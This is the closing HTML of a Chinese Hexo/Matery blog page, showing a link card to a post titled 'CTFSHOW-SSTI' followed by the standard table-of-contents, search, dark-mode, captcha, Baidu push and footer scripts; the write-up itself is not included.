                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/%E6%97%A0%E9%A2%98_97085306.jpg" class="responsive-img" alt="CTFSHOW-SSTI">
                        
                        <span class="card-title">CTFSHOW-SSTI</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-07-26
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTFSHOW/" class="post-category">
                                    CTFSHOW
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E5%88%B7%E9%A2%98/">
                        <span class="chip bg-color">刷题</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
